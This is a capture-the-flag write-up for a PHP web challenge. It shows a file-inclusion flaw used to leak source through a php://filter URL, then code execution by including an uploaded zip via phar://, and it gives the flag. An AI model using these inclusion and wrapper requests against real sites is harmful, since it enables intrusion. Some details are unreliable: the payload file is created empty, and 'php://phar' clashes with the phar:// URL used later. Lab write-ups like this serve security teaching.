Visiting the challenge, we are redirected to http://challenges.ctf.cert.rcts.pt:59812/index.php?option=home.

Upon requesting an invalid `option`, we are presented with a PHP error, which shows whatever the `option` query has been included with `.php` suffix. We exploit this using PHP wrappers, and grab the source code

URL: http://challenges.ctf.cert.rcts.pt:59812/index.php?option=file=php://filter/convert.base64-encode/resource=index
Using the same method for `resource=upload`, `resource=download`, and `resource=home`, we can find our uploaded file is being saved at `uploads/md5(password)/md5(key).extension`. We also observe, `php://zip` is blocked but `php://phar` is allowed. We can exploit this and pass a malicious payload to get the flag.

```bash
echo "" > payload.php
zip payload.zip payload.php;
```

Upload payload.zip, get key, and find the upload directory using above mentioned structure. Upon visiting
```
http://challenges.ctf.cert.rcts.pt:59812/index.php?option=phar://uploads/md5(password)/md5(key).zip/payload
```

We get our flag. (Notice here we don't include `.php` as `include()` auto adds `.php` according to the `index.php` source code we just retrieved.

## flag
`flag{ph4r_d3s3r14l1z4t10n_f0r_th3_w1n}`